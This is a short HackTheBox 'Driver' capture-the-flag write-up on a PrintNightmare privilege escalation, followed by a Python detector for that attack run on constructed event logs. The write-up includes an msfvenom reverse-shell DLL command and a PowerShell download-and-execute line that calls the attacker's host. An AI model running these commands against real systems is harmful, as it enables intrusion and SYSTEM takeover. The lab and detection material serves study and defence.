HackTheBox-Driver

NMAP

PORT     STATE SERVICE      REASON          VERSION
80/tcp   open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
445/tcp  open  microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

PORT 139/445 (SMB)

PORT 80 (HTTP)

responder -I tun0 -rdw -v

Privilege Escalation (Print Nightmare Python)

The web page suggests that a print spooler service is running, so we can test whether the machine is vulnerable to PrintNightmare. This requires some setup, as we need to clone the specific impacket repo.

msfvenom  x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.125 LPORT=2222 -f dll -o /var/smb/shell.dll

Print Nightmare (Powershell)

We can also achieve SYSTEM on this machine through PowerShell, without needing to set up an SMB server.

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.120/nightmare.ps1');
Invoke-Nightmare -NewUser "USER" -NewPassword "PASS"
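Added example (not part of the original writeup): a small Python detector, run over constructed Microsoft-Windows-PrintService/Operational and Security event lines, that flags the traces a PrintNightmare driver install like the one above leaves behind: event 316 listing a driver file from a UNC or non-spool path, event 808 when the spooler fails to load the planted DLL as a plug-in, and a 4720/4732 local account change shortly afterwards (the -NewUser/-NewPassword step). The pipe-delimited line format and the message texts are constructed approximations; only the event IDs are the real ones.

```python
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs): "<ISO time>|<channel>|<event id>|<message>". Event IDs are real, message text is approximate.
SAMPLE_LOG = r"""
2021-10-01T12:00:01|Microsoft-Windows-PrintService/Operational|316|Printer driver HP Universal Printing PCL 6 for Windows x64 Version-3 was added or updated. Files:- hpcu220u.dll, hpcu220u.cfg
2021-10-01T12:05:10|Microsoft-Windows-PrintService/Operational|316|Printer driver Generic Printer for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, kernelbase.dll, \\10.10.14.125\smb\shell.dll
2021-10-01T12:05:11|Microsoft-Windows-PrintService/Operational|808|The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\new\shell.dll. Error code 0x7e.
2021-10-01T12:05:14|Security|4720|A user account was created. New Account Name: USER
2021-10-01T12:05:15|Security|4732|A member was added to a security-enabled local group. Group Name: Administrators, Member: USER
"""

TRUSTED_DRIVER_DIR = r"c:\windows\system32\spool\drivers"

def parse(log_text):
    """Split the constructed pipe-delimited lines into event dicts."""
    events = []
    for line in log_text.strip().splitlines():
        ts, channel, eid, msg = line.split("|", 3)
        events.append({"ts": datetime.fromisoformat(ts), "channel": channel, "id": int(eid), "msg": msg})
    return events

def driver_files(msg):
    m = re.search(r"Files:-\s*(.*)$", msg)  # file list from a 316 "Files:- a, b, c" message
    return [f.strip() for f in m.group(1).split(",")] if m else []

def suspicious_file(path):
    """A legitimate driver install ships files from the spool driver store, not a UNC share or an arbitrary absolute path."""
    p = path.lower()
    if p.startswith("\\\\"):  # UNC path such as \\attacker\share\payload.dll
        return True
    return ":" in p and not p.startswith(TRUSTED_DRIVER_DIR)

def detect(events, window=timedelta(minutes=5)):
    """Return (timestamp, reason) alerts for the PrintNightmare pattern."""
    alerts, anchors = [], []  # anchors: timestamps of suspicious spooler events
    for e in events:
        if e["id"] == 316 and any(suspicious_file(f) for f in driver_files(e["msg"])):
            alerts.append((e["ts"], "316: printer driver added with a file from an untrusted path"))
            anchors.append(e["ts"])
        elif e["id"] == 808:
            # A payload DLL without printer-driver exports typically fails to load as a plug-in
            alerts.append((e["ts"], "808: spooler failed to load a plug-in module"))
            anchors.append(e["ts"])
        elif e["id"] in (4720, 4732) and any(timedelta(0) <= e["ts"] - a <= window for a in anchors):
            # Invoke-Nightmare -NewUser creates a local admin right after the driver is loaded
            alerts.append((e["ts"], f"{e['id']}: local account change shortly after a suspicious spooler event"))
    return alerts
```

Calling `detect(parse(SAMPLE_LOG))` yields four alerts (316, 808, 4720, 4732); the legitimate HP driver install at 12:00 is not flagged.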
